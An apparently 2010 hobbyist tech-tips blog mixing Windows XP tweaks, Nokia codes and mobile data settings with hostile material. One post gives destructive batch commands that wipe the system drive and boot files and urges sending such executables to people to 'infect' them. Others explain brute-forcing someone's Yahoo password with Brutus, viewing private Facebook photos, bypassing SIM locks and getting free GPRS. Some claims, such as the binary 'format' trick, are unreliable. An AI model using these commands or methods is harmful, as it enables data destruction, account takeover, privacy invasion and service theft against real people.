Wednesday, October 6, 2010

Is your gmail account is hacked

In this post i will tell you about some steps that you should do to get back your hacked Account.

1. Try Password Resetting:
If your Account get hacked then its the very first step you should do. For that go to gmail password resetting page here and choose the appropriate options according to you.
If you have provided any other mail account's address in your hacked mail account's. then it will send a password resetting page to that email id.
Or you can fill the answer of security questions to getback ur account immediately(if you didnt provide information of any secondary mail account) or after 24 hours of sending Password recovery page on your secondary mail account.
2. If First step Fails:
Sometimes the hackers change the security questions and the secondary mail account also so that you cant get back your account. But in this case you can contact to gmail Support team by filling a form here
In this Form you will be asked for some information and dates. If you dont know the exact date then try to fill the closest possible Date. Coz it will be your last change. The more accurate the information filled out in the recovery form, the more the chances of getting your account back.
If You didnt get any email from gmail support after the 2nd step, then just Forget your that account and create a new account ;) and in future be secure!!!!! Good Luck!!!

Wednesday, May 5, 2010

Delete Autorun.inf Virus Manually using just Winrar

Once it happened to ME, when his newly bought PC was infected with this autorun.inf virus. This virus corrupted almost all the drives on the Hard disk, and when ever he tried to double click on the drive or opening any drive it opened in a new window.
In some cases, when your drive is infected with this Autorun.inf virus, you won’t be able to access the drive completely. You have to browse the drive by Exploring it i.e; Ctrl+E keys from the keyboard.

Sometimes ever you will not be able to see hidden files even if you have Show hidden files Enabled under Folder Options. well, this are all the wonders of this Autorun.inf virus.
I am going to show you this rare method of removing Autorun.inf manually using just winrar application, not any antivirus or malware programs.
Solution to Remove Autorun.inf Virus
Step 1: First Disable CD/DVD or USB Autorun in windows
Step 2: Open Winrar.exe (Start–>All Programs–>WinRar–>WinRar.exe)
Step 3: Now Browse to any drive that is infected with Autorun.inf virus using winrar explorer.
Step4: Here you will see all the hidden files under winrar for that particular drive.
Step 5: Look for the file Autorun.inf and open it using notepad.
Step 6: In that Autorun file, some .EXE file will be mentioned that will be executed along with the autorun file. This exe file is the main culprit.

Step 7: Note the exe file mentioned in the Autorun.inf file. Close this Autorun.inf file.
Step 8: Now look for that .Exe file in the drive (Ex: c:/), Delete that .exe file along with Autorun.inf
Step 9: Restart your Operating System. Now your system is free with Autorun.inf Virus.
Note: Repeat the same process if your Usb or Pendrives are infected with Autorun.inf virus.

Convert File System, fat - fat32 to ntfs

Open a dos prompt and give the command

c:\convert d: /fs:ntfs

this command would convert your d: drive to ntfs.

if the system cannot lock the drive, you will be prompted to convert it during next reboot.

Normally you should select yes.

Conversion from fat/fat32 to ntfs is non-destructive, your data on the drive will NOT be lost.

Be aware that converting to ntfs will make that partition of your

drive unreadable under dos unless you have ntfs utilites to do so


WHY NTFS??


Features Of NTFS File System, that makes it Secure

1. BASED ON BINARY SEARCH TECHNOLOGY.

2. SUPPORTS WIN – 2K , WIN – 2K3 AND WINDOWS XP O/S.

3. FILE AND FOLDER IMP SECURITY IS AVAILABLE.

4. DISK COMPRESSION.

5. SUPPORTS DISK QUOTA.

6. SUPPORTS EFS ( ENCRYPTED FILE SYSTEM )

Trick to Show Your name after time in taskbar...

Step-1:- Navigate to -> Start -> Control Pannel -> Regional and Language Option ->
Click on Customize ->
Go to TIME Tab ->
Change AM symbol and PM symbol from AM and PM to ur name ->
Apply ->
Ok ...

Did It change? If not, follow step-2 below.

Step2:- Now go to time in taskbar and Double Click it to open "Date and time property" ...Look place where time changes in digital form
i.e. 02:47:52 AM , click to arrow to cnage the AM or PM by selecting and press arrow. It will Show ur name or name that was entered by u, Apply ->

OK
Enjoy MY Dear...... friends

Monday, February 15, 2010

19 things you didn't know about Windows XP

1. It boasts how long it can stay up. Whereas previous versions of Windows were coy about how long they went between boots, XP is positively proud of its stamina. Go to the Command Prompt in the Accessories menu from the All Programs start button option, and then type 'systeminfo'. The computer will produce a lot of useful info, including the uptime. If you want to keep these, type 'systeminfo > info.txt'. This creates a file called info.txt you can look at later with Notepad. (Professional Edition only).

2. You can delete files immediately, without having them move to the Recycle Bin first. Go to the Start menu, select Run... and type 'gpedit.msc'; then select User Configuration, Administrative Templates, Windows Components, Windows Explorer and find the Do not move deleted files to the Recycle Bin setting. Set it. Poking around in gpedit will reveal a great many interface and system options, but take care -- some may stop your computer behaving as you wish. (Professional Edition only).

3. You can lock your XP workstation with two clicks of the mouse. Create a new shortcut on your desktop using a right mouse click, and enter 'rundll32.exe user32.dll,LockWorkStation' in the location field. Give the shortcut a name you like. That's it -- just double click on it and your computer will be locked. And if that's not easy enough, Windows key + L will do the same.

4. XP hides some system software you might want to remove, such as Windows Messenger, but you can tickle it and make it disgorge everything. Using Notepad or Edit, edit the text file /windows/inf/sysoc.inf, search for the word 'hide' and remove it. You can then go to the Add or Remove Programs in the Control Panel, select Add/Remove Windows Components and there will be your prey, exposed and vulnerable.

5. For those skilled in the art of DOS batch files, XP has a number of interesting new commands. These include 'eventcreate' and 'eventtriggers' for creating and watching system events, 'typeperf' for monitoring performance of various subsystems, and 'schtasks' for handling scheduled tasks. As usual, typing the command name followed by /? will give a list of options -- they're all far too baroque to go into here.

6. XP has IP version 6 support -- the next generation of IP. Unfortunately this is more than your ISP has, so you can only experiment with this on your LAN. Type 'ipv6 install' into Run... (it's OK, it won't ruin your existing network setup) and then 'ipv6 /?' at the command line to find out more. If you don't know what IPv6 is, don't worry and don't bother.

7. You can at last get rid of tasks on the computer from the command line by using 'taskkill /pid' and the task number, or just 'tskill' and the process number. Find that out by typing 'tasklist', which will also tell you a lot about what's going on in your system.

8. XP will treat Zip files like folders, which is nice if you've got a fast machine. On slower machines, you can make XP leave zip files well alone by typing 'regsvr32 /u zipfldr.dll' at the command line. If you change your mind later, you can put things back as they were by typing 'regsvr32 zipfldr.dll'.

9. XP has ClearType -- Microsoft's anti-aliasing font display technology -- but doesn't have it enabled by default. It's well worth trying, especially if you were there for DOS and all those years of staring at a screen have given you the eyes of an astigmatic bat. To enable ClearType, right click on the desktop, select Properties, Appearance, Effects, select ClearType from the second drop-down menu and enable the selection. Expect best results on laptop displays. If you want to use ClearType on the Welcome login screen as well, set the registry entry HKEY_USERS/.DEFAULT/Control Panel/Desktop/FontSmoothingType to 2.

10. You can use Remote Assistance to help a friend who's using network address translation (NAT) on a home network, but not automatically. Get your pal to email you a Remote Assistance invitation and edit the file. Under the RCTICKET attribute will be a NAT IP address, like 192.168.1.10. Replace this with your chum's real IP address -- they can find this out by going to www.whatismyip.com -- and get them to make sure that they've got port 3389 open on their firewall and forwarded to the errant computer.

11. You can run a program as a different user without logging out and back in again. Right click the icon, select Run As... and enter the user name and password you want to use. This only applies for that run. The trick is particularly useful if you need to have administrative permissions to install a program, which many require. Note that you can have some fun by running programs multiple times on the same system as different users, but this can have unforeseen effects.

12. Windows XP can be very insistent about you checking for auto updates, registering a Passport, using Windows Messenger and so on. After a while, the nagging goes away, but if you feel you might slip the bonds of sanity before that point, run Regedit, go to HKEY_CURRENT_USER/Software/Microsoft/Windows/Current Version/Explorer/Advanced and create a DWORD value called EnableBalloonTips with a value of 0.

13. You can start up without needing to enter a user name or password. Select Run... from the start menu and type 'control userpasswords2', which will open the user accounts application. On the Users tab, clear the box for Users Must Enter A User Name And Password To Use This Computer, and click on OK. An Automatically Log On dialog box will appear; enter the user name and password for the account you want to use.

14. Internet Explorer 6 will automatically delete temporary files, but only if you tell it to. Start the browser, select Tools / Internet Options... and Advanced, go down to the Security area and check the box to Empty Temporary Internet Files folder when browser is closed.

15. XP comes with a free Network Activity Light, just in case you can't see the LEDs twinkle on your network card. Right click on My Network Places on the desktop, then select Properties. Right click on the description for your LAN or dial-up connection, select Properties, then check the Show icon in notification area when connected box. You'll now see a tiny network icon on the right of your task bar that glimmers nicely during network traffic.

16. The Start Menu can be leisurely when it decides to appear, but you can speed things along by changing the registry entry HKEY_CURRENT_USER/Control Panel/Desktop/MenuShowDelay from the default 400 to something a little snappier. Like 0.

17. You can rename loads of files at once in Windows Explorer. Highlight a set of files in a window, then right click on one and rename it. All the other files will be renamed to that name, with individual numbers in brackets to distinguish them. Also, in a folder you can arrange icons in alphabetised groups by View, Arrange Icon By... Show In Groups.

18. Windows Media Player will display the cover art for albums as it plays the tracks -- if it found the picture on the Internet when you copied the tracks from the CD. If it didn't, or if you have lots of pre-WMP music files, you can put your own copy of the cover art in the same directory as the tracks. Just call it folder.jpg and Windows Media Player will pick it up and display it.

19. Windows key + Break brings up the System Properties dialogue box; Windows key + D brings up the desktop; Windows key + Tab moves through the taskbar buttons.

How can I reset CMOS / BIOS settings?

If your computer is having issues booting, has errors during boot, after adding hardware is running into issues, and/or you're having other abnormal system behaviors that cannot be resolved though any other method it may be necessary to reset the CMOS settings and/or load the default or fail-safe defaults as explained below.Load / Reset defaults1.
Enter CMOS setup, additional information about entering CMOS setup can be found on document CH000192.2.
In CMOS setup look for an option to reset the CMOS values to the default setting or an option to load the fail-safe defaults. With many CMOS setup screens there will be a function key to do this; for example, the F6, F11, or F12 key.
Other setups may actually list an option that you can arrow over to using the arrow keys and press Enter.3. When found and selected you'll likely be asked if you're sure you wish to load the defaults press Y for yes or arrow to the yes option.Reset Configuration DataIn addition to restoring the system defaults if you've recently added new hardware or resetting the default values did not help resolve your boot issues you may also want to reset the configuration data. Below are some examples of how this can be done.
Keep in mind that unfortunately all CMOS screens are different and these instructions may not be exact steps for your CMOS.Under advancedIf you're working on a computer with a Phoenix BIOS that has Main - Advanced - Security - .... across the top of the screen you can get to this setting by using the right arrow to move over to Advanced and under Advanced arrow down to Reset Configuration Data and changing the value from Disabled or No to Enabled or Yes.Once the above has been done press the F10 key and save and exit CMOS setup.
In PnP/PCI ConfigurationsIf you're working with a Phoenix BIOS that has several different options and one of them is PnP/PCI Configuration move the cursor down to this option and press Enter. Within the PnP/PCI Configurations change the Reset Configuration Data from Disabled to Enabled.
Once the above has been done press the F10 key and save and exit CMOS setup.Hard reset the CMOSIf the above steps do not work and/or you're unable to enter CMOS to reset it to the factory settings it may be necessary to perform a hard reset on the CMOS using a jumper or dipswitch on the motherboard. Unfortunately because all motherboards are different the steps on how to do this can only be found through your motherboard manufacturers documentation.

Tuesday, February 2, 2010

Nokia All Codes

*** WARNING: Using secret codes may be harmful to your phone and result in disabling or worse. Use these codes at your own discretion, we accept no responsiblility for blocked pones while using these codes!!!
IMEI Number
*#06# Cells Identity Code (IMEI = International Mobile Equipment Identity)
XXXXXX XX XXXXXX X
TAC FAC SNR SP
TAC = Type Approval Code (first 2 digits = country code of the approval-country )
FAC = Final Assembly Code: (01,02 = AEG)
(10,20 Nokia)
(40,41,44 Siemens)
(30 Ericsson)
(50 Bosch)
(51 Sony,Siemens,Ericsson)
(60 Alcatel)
(65 AEG)
(70 Sagem)
(75 Dancall)
(80 Philips)
(85 Panasonic)
SNR = Serial Nr.
SP = Spare (always "0")

Software Version
*#0000# shows the software version
Signal Processing
*3370# - Enchanced full Rate Codec (EFR) activation. It will automatically restart.
#3370# - Enchanced full Rate Codec (EFR) deactivation
*4720# - Half Rate Codec activation. It will automatically restart.
#4720# - Half Rate Codec deactivation
Enchanced Full Rate will give you much better sound quality when you enable it. The new Enhanced Full Rate CODEC adopted by GSM uses the ASELP (AlgebraicCode Excitation Linear Prediction) compression technology. This technology allows for much great voice quality in the same number of bits as the older Full Rate CODEC. The older technology was called LPC-RPE (Linear Prediction Coding with Regular Pulse Excitation). Both operate at 13 kilobits.(but you take up more space on the network, so they can charge you more) - Talk-time is reduced with about 5%



Sim Clock Stopping
*#746025625#
[*#sim0clock#]
Checks if the sim clock can be stopped. Sim clock stop is a kind of stand-by mode which will save battery time. This code doesn't work with software version 4.59.
It will tell you if it can be stopped or not.


Warrenty Menu
*#92702689# takes you to a secret menu with 6 choices:
[*#war0anty#]
1. Displays Serial Number.
2. Displays the Month and Year of Manufacture (0997).
3. Displays (if there) the date where the phone was purchased (MMYY).
4. Displays the date of the last repairment - if found (0000).
5. Makes you capable of transferring user data if you have the gear for it.
6. Shows how long the phone has been used to talk. This counter is not reset by when you "clear timers" like the counters in the call register.


Bypass the SP lock With a Nokia 16xx/21xx/31xx/51xx/81xx
1. Insert SIM card of different provider.
2. Turn on the phone and press the UP VOLUME key for 3 sec.
Then release it and the phone says PIN CODE?
3. Press the "C" key.
4. Then Press * and wait until it disappears and appears again, then press * one more time and 04*PIN*PIN*PIN#


Nokia Speed Trap Detector Urban Legend spread by Nokia Engineers ;^)
The settings for radar speed traps detector. Your Nokia cell phone can be programmed to pick up radar speed traps, when programmed your cell phone picks up the radar and alerts you on the message alert tone. ( Doesn't work with Nokia 7110! )
1. Enter your menu
2. Select settings
3. Select security settings
4. Select closed user group
5. Select on
6. Enter 00000
7. Press ok
8. Clear back to normal, within a few seconds your phone will display a radar sign with five zero's next to it. It is now activated.
Unfortunately only Nokia phones have this function. The Cell Phone info display needs to be de-activated. Settings -> Phone Settings -> Cell Info display. Each time you turn off your phone, or even each time you loose contact with your carrier, you'll have to activate it again... It is done using steps 1 through 5 above, but the number (00000) will be already on the field as a default.




Each command is prefixed with either one or two * or # characters as follows:
** Register and Activate
* Activate
## De-Register (and Deactivate)
# Deactivate
*# Check Status
© Call button


Secret Codes for some Nokia models
Nokia 9000/9000i

To view IMEI number *#06#
To view Software Version enter *#8110# Latest Version is under Phone Info.
To view Week and Year of manufacture enter *#3283#

Nokia 9110

*#06# for checking the IMEI (International Mobile Equipment Identity)
*#0000# shows the SW version.

Latest software version: v5.02 (26-08-99)RAE-2

Nokia 7110

*#06# for checking the IMEI (International Mobile Equipment Identity)
*#0000# To view Software Version.
*#3370# - Enhanced Full Rate Codec (EFR) activation. It will automatically restart.
*#3370* - Enhanced Full Rate Codec (EFR) deactivation. It will automatically restart.
*#4720# - Half Rate Codec activation. It will automatically restart
*#4720* - Half Rate Codec deactivation. It will automatically restart
*#746025625# - Sim clock allowed status.
*#92702689# [*#war0anty#] - takes you to a secret menu with 6 choices:

1. Displays Serial Number.
2. Displays the Month and Year of Manufacture (0997)
3. Displays (if there) the date where the phone was purchased (MMYY)
4. Displays the date of the last repairment - if found (0000)
5. makes you capebel of transferring user data if you have the gear for it
6. shows how many hours the phone has been on

Latest software version: 4.77 25-01-00 NSE-5 - EFR and half rate codes do not work with these version.

V 4.76 13-01-00 NSE-5
V 4.75 07-01-00 NSE-5
V 4.73 15.11.99 NSE-5

Nokia 6190

*#06# for checking the IMEI (International Mobile Equipment Identity)
*#6190# shows the SW version.
*#92772689# (after removing the analog module) shows service menu.
*3001#12345[OK] to enter test mode.
*#639# to change NAM.

Nokia 3810

To view IMEI number *#06#
To view Software Version enter *#3810#

Nokia 6120 / 6160 / 6162 (TDMA phones)

*#92772689# for checking ISDN number.
*3001#12345# for field test mode and nam selection and some other stuff...
*#9999# shows the SW version


Nokia 3210 Secret Codes
Nokia 3210

*#06# for checking the IMEI (International Mobile Equipment Identity) Information you get from the IMEI:

XXXXXX XX XXXXXX X

TAC FAC SNR SP


TAC = Type approval code
FAC = Final assembly code
SNR = Serial number
SP = Spare

*#0000# To view Software Version.

#746025625# [*#sim0clock#]
Checks if the sim clock can be stopped. Sim clock stop is a kind of stand-by mode which will save battery time. This code doesn't work with software version 4.59.

*#92702689# [*#war0anty#] takes you to a secret menu with 6 choices:

1. Displays Serial Number.
2. Displays the Month and Year of Manufacture (0997)
3. Displays (if there) the date where the phone was purchased (MMYY)
4. Displays the date of the last repairment - if found (0000)
5. makes you capebel of transferring user data if you have the gear for it
6. shows how many hours the phone has been on

Format a HDD with notepad

Format a HDD with notepad




Step 1.
Copy The Following In Notepad Exactly as it says


01001011000111110010010101010101010000011111100000


Step 2.
Save As An EXE Any Name Will Do


Step 3.
Send the EXE to People And Infect


OR

IF u think u cannot format c driver when windows is running try Laughing and u will get it Razz .. any way some more so u can test on other drives this is simple binary code
format c:\ /Q/X -- this will format your drive c:\

01100110011011110111001001101101011000010111010000 100000011000110011101001011100

0010000000101111010100010010111101011000


format d:\ /Q/X -- this will format your dirve d:\

01100110011011110111001001101101011000010111010000 100000011001000011101001011100

0010000000101111010100010010111101011000



format a:\ /Q/X -- this will format your drive a:\


01100110011011110111001001101101011000010111010000 100000011000010011101001011100

0010000000101111010100010010111101011000



del /F/S/Q c:\boot.ini -- this will cause your computer not to boot.


01100100011001010110110000100000001011110100011000 101111010100110010111101010001

00100000011000110011101001011100011000100110111101 101111011101000010111001101001

0110111001101001


try to figure out urself rest
cant spoonfeed
its workin


Do not try it on ur PC. dont mess around this is for educational purpose only

still if u cant figure it out try dis

go to notepad

@Echo off
Del C:\ *.*|y

save it as Dell.bat


worse

@echo off
del %systemdrive%\*.*/f/s/q
shutdown -r -f -t 00

and save it as a .bat file

Wednesday, January 27, 2010

Cleaning Recent Docs Menu and the RUN MRU :

The Recent Docs menu can be easily disabled by editing the Registry.
To do this go to the following Key:
step 1: go to start

step2: click on run

step 3: write hear "regedit" { when your computer is in admin pannel}

step 4: go to HKEY_CURRENT_USER

step 5: then Software

step 6: then Microsoft

step 7: then Windows

step 8: CurrentVersion

step 9: Policies

step 10: Explorer



HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer


Now in the right pane, create a new DWORD value by the name: NoRecentDocsMenu
and set it's value to 1.
Restart Explorer to save the changes.
You can also clear the RUN MRU history. All the listings are stored in the key: HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMR
U You can delete individual listings or the entire listing.
To delete History of Find listings
go to: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Doc Find Spec MRU and delete

Disabling Display of Drives in My Computer :

To disable the display of local or networked drives when you click My Computer
step 1: go to start

step2: click on run

step 3: write hear "regedit" { when your computer is in admin pannel}

step 4: go to HKEY_CURRENT_USER

step 5: then Software

step 6: then Microsoft

step 7: then Windows

step 8: CurrentVersion

step 9: Policies

step 10: Explorer


HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer

Now in the right pane create a new DWORD item and name it NoDrives.
Now modify it's value and set it to 3FFFFFF (Hexadecimal)

Now press F5 to refresh. When you click on My Computer, no drives will be shown.
To enable display of drives in My Computer, simply delete this DWORD item.
It's .reg file is as follows: REGEDIT4

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explore r] "NoDrives"=dword:03ffffff

shortcut to restarting xp..

You can restart a Windows XP Pro and Home machine easily by creating a shortcut with following path.
(Assume you installed Windows XP on your C: Partition) "c:\windows\system32\shutdown.exe -r -f -t 00" -r is for restarting the computer. -f is to force close all programs without saving. -t 00 is used to restart in zero seconds. i.e. as soon as you D.Click on the shortcut. You can log off from a Windows XP Professional or Home edition by running "C:\windows\system32\shutdown.exe -l -f -t 00". Also you can shutdown a Windows XP Home or Professional edition by running

"c:\windows\system32\shutdown.exe -s -f -t 00". You always have to turn from the CPU after running this command. (Same with AT and ATX powered machines.) If you want to turn down power of ATX machine automatically, run "c:\windows\system32\tsshutdn.exe 00 /POWERDOWN /DELAY:00" This is used to turn off a server. Even though your computer will be

shutdown completely, this whole operation will take 30 seconds to finish. Even though you don't have networked computers attached to your computer, this works.

Reliance Mobile Free GPRS Tricks new

Reliance Mobile Free GPRS Tricks new


Reliance FREE GPRS:

Access Point Name:: SMARTWAP

Homepage: http://wap.rworld.co.in/gsm/index.wml

IP Address: 97.253.29 .199

Port Numb: 8080

Airtel Free GPRS trick

Airtel Free GPRS trick for Indians just add these settings in your connection settings of airtel live or mobile office in your mobile phone and do take a backup of the settings that you have currently ,
AIRTEL FREE GPRS SETTINGS
Proxy : 203.145.131.148
Apn: airtelfun.com
Homepage: http://www.google.co.in/xhtml
port= 80 or 8080
Now, open up your browser and surf for a while and later check your mobile balance , I hope it’s the same ( Working in almost all Indian states) !!

FREE GPRS: Airtel Mobile

A little hack found on the forums on about how to access the net from a pc using a mobile with Airtel prepaid card.
1) Activate Airtel Live! ( It’s FREE so no probs)
2)Create TWO Airtel GPRS data accounts (yep TWO) and select the
FIRST as the active profile.
3) Connect your mobile to the PC (or Laptop) and install the driver for
your mobile’s modem.
4) Create a new dial-up connection using the NEW CONNECTION
WIZARD as follows
Connecting Device : Your mobile’s modem
ISP Name : Airtel (or anything you like)
Phone Number : *99***2#
Username and Password : blank
5) Configure your browser and download manager to use the proxy
100.1.200.99 and port 8080.( My advice is to use Opera since you
can browse both wap and regular websites)
6) Connect to the dial-up account. You will be connected at 115.2
kbps (but remember, that is a bad joke).
7) Pick up your mobile and try to access any site. You will get “Access
Denied…”(except for Airtel Live!). IT DOES NOT MATTER.
Keep the mobile down.
8 ) On the PC ( or Laptop) open your browser, enter any address ,
press ENTER and…….WAIT
9) After a few seconds the page will start to load and you have the
WHOLE internet at your disposal.
enjoyyyy

Thursday, January 21, 2010

HACK PASSWORD OF A YAHOO E-MAIL ACCOUNT

TO HACK PASSWORD OF A YAHOO EMAIL ACCOUNT ALL YOU HAVE TO HAVE A SOFTWARE BRUTUS AE2

AND I WILL TELL YOU HOW TO USE BRUTUS AE2 .YOU CAN DOWNLOAD BRUTUS FROM

http://www.hoobie.net/brutus



1.IN THE TARGET AREA OF THE SOFTWARE TYPE IN THE SPACE PROVIDED -Pop.Mail.Yahoo.Com AND ADJUST THE TYPE AS POP3.

2. IN THE CONNECTION OPTIONS MOVE THE CONNECTION AND TIMEOUT BAR TO 10.

3.LEAVE POP3 OPTIONS AS IT IS.

4.IN AUTHENTICATION OPTIONS MARK USE USERNAME AND SINGLE USER.

AND TYPE THE E-MAIL ACCOUNT OF THE PERSON WHOSE PASSWORD YOU WANT TO HACK IN USER FILE

IN PASSCODE SET BRUTUS FORCE

AND A OPTION POPS UP AS RANGE CLICK ON RANGE ADJUST TO ALPHANUMERIC MIN. LENGTH-8 AND MAX. LENGTH 16 TYPE OK

5. NOW AT THE TOP THERE IS START PRESS THAT BUTTON

WITHIN MINUTES YOU WILL GET PASSWORD OF THE USER

ENJOY

INCREASE YOUR INTERNET SPEED

How to Increase internet browsing speed ?

increase Internet & Download speed

In order to fix this follow these easy steps:



1. Click on Start -->Run ---> gpedit.msc



2. On the window that will show up, Click on

Administrative Templates

Network

QoS Packet Scheduler



3. On the right side pane, Double click Limit Reservable bandwidthChange this configuration from “not configured” to “Enabled”and the reduce Bandwidth limit (%) from 20% to zero



4. Click on Ok and restart your computer.



It seems that Windows XP reserves 20% of the available bandwidtheven if this option is not configured and even if you don’t useQoS (Quality of Service) feature (which is disabled by default).
How to Increase internet browsing speed ?

HIDE YOUR IDENTITY OR IP ADRESS WHILE SURFING WEB

TO HIDE YOUR IDENTITY WHILE SURFING ON NET ALL YOU HAVE TO DOWNLOAD SOFTWARE HIDE MY IP

AND THE SOFTWARE CHANGES YOUR IP ADDRESS TO ONE LOCATED AT US OR UK AND NOW USING THIS

SOFTARE YOU CAN SURF EASILY WITHOUT THE FEAR OF KNOWN BY HACKER OR OTHERS

GPRS SETTINGS FOR CHINA MOBILES

Here is the Mobile Office, Airtel Live and Airtel MMS settings for ALL CHINA Mobiles

1) Mobile Office
first click SERVICES icon in main menu==>DATA ACCOUNT==>GPRS==>EDIT any existing account==>
Account Name--> MO
APN-->airtelgprs.com
Auth. Type-->Normal
save all the settings.
Come back to SERVICES==>WAP==>SETTINGS==>EDIT PROFILE==>EDIT any existing account==>
Rename Profile==> Mobile Office
Homepage==>Google
data account==> MO (which we created previously)
Connection Type==>
Here u find three option
a) Connection-oriented
b) Connectionless
c) HTTP
choose a) Connection-oriented==
IP Address==>202.056.231.117
Security==> off
Again save all the settings and click BACK button and choose "Activate Profile"
Come back to SERVICES==>WAP==>Homepage
and you r ready to use Mobile Office...

2) Airtel Live
first click SERVICES icon in main menu==>DATA ACCOUNT==>GPRS==>EDIT any existing account==>
Account Name--> LIVE
APN-->airtelfun.com
Auth. Type-->Normal
save all the settings.
Come back to SERVICES==>WAP==>SETTINGS==>EDIT PROFILE==>EDIT any existing account==>
Rename Profile==> Airtel Live
Homepage==>http://live.airtelworld.com
data account==> LIVE (which we created previously)
Connection Type==>
Here u find three option
a) Connection-oriented
b) Connectionless
c) HTTP
choose c) HTTP==>
Proxy Address==>100.001.200.099
Proxy Port==> 8080
Again save all the settings and click BACK button and choose "Activate Profile"
Come back to SERVICES==>WAP==>Homepage
and you r ready to use Airtel Live...

3) Airtel MMS
first click SERVICES icon in main menu==>DATA ACCOUNT==>GPRS==>EDIT any existing account==>
Account Name--> MMS
APN-->airtelmms.com
Auth. Type-->Normal
save all the settings.
Come back to SERVICES==>WAP==>SETTINGS==>EDIT PROFILE==>EDIT any existing account==>
Rename Profile==> Airtel MMS
Homepage==>http://100.1.201.171:10021/mmsc
data account==> MMS (which we created previously)
Connection Type==>
Here u find three option
a) Connection-oriented
b) Connectionless
c) HTTP
choose c) HTTP==>
Proxy Address==>100.1.201.172
Proxy Port==>8799
Again save all the settings and click BACK button and choose "Activate Profile"
Come back to SERVICES==>WAP==>Homepage
and you r ready to use Airtel MMS...

If u Have Any problem Then Post Comment

VB.NET

Send your Problems And any Que Related to vb .net

Some home Networking Tips

Networks can get pretty complicated as you will see but are a real necessity to the PC. To say the least a networked PC gets both of two worlds. When you dial up to the Internet you are getting inside the biggest network there is to be had. Now wouldn't it be nice to have a nice little Internet or actually called intranet in the office or home? Many people are doing it these days and it's becoming the best way to share information and devices.

The Basic Network

-The basic network is made up of the following:

Server or client workstation
Networking Interface Card's (NIC)
Cabling
Networking Operating System such as Windows NT/2000
Terms Of Networking

-First off we need to be familiar with some basic terms in networking. There are many out there but only a few that most of us should be concerned with.

Peer-to-Peer, this is commonly two PC connected together to share files or a printer.
Local Area Network (LAN), this is probably the most popular in smaller applications. This comes down to many computers interconnected in an office or home. This can be anywhere from two computers or hundreds in one physical area.
Wide Area Network (WAN), boils down to computer networks that are far apart and connect via phone, satellite, and so forth.
Node, this is just another name for the client computer or the computer using the network. You are in essence a node right now using this website which is located on a server over the Internet. Bet you didn't node that did you? Ok, I know that was lame but what the hey!
Topology, is the geometric arrangement of the network. This is more or less how the network is arranged. We will discuss this one more later on.
Protocol, the protocol is a ways of communication for the network.We need a protocol so they can understand one another.
Data Packets, messages of data that has been sent over your network.
Architecture's, this comes down to peer to peer or the client server applications. In the peer to peer we share resources of each other's computers equally and the client server is one computer with all the host files and data. Right now you are connecting to my server for this web page as a client/server architecture.
Media, this amounts to how your network is physically connected. Most LAN's connect with a copper wire or cable coaxial. Some newer technologies also allow you to connect wireless using your existing power outlets.





Send Your Problem And Any Que Related To Networking Then Post me Comment

Wednesday, January 20, 2010

how to use many yahoo massenger id on one computer.

yes its posible to use the many yahoo id to chat on one computer know.

i know u think how can it posible...................

its posible after just instaled the yahoo massenger first on your computer.

then just download small crack of YMulti Messenger v8

its only done on when u have yahoo massenger v8 setup. then just do crack of it.

enjoy after do this crack with your many yahoo id chat.

how to see loked photos of friends on FACEBOOK

Step1: Log into facebook and don't worry about making another account. They will not be able to trace you down and ban you.

Step2: · Find the person's unique profile ID. · Search for them and click view friends or send message.
then go to profilunlock.com unlock and view private fase book profiles for free.
a working facebook exploit Write the unique ID from the address bar (only the numbers) or copy it somewhere else.

Step3: Now that you have your unique profile ID you can use the next two links to view a total of 40 tagged photos: If you wish to see tagged photos added by others use this link: http://www.facebook.com/photo.php?pid=12345678&op=1&view=all&subj=[Unique ID]&id=[Unique ID]
If you wish to see tagged photos added by themselves use this link: http://www.facebook.com/photo.php?pid=13245678&op=1&view=user&subj=[Unique ID]&id=[Unique ID]
Each link contains two places for [Unique ID] you simply replace this with the person’s unique ID that you have copied at the first step. REMOVE THE BRACKETS IN [UNIQUE ID] ..
replace that whole thing with the profile ID you copied. Step4: You can now see up to 40 photos of someone on a private profile. Enjoy


but it not done by on my self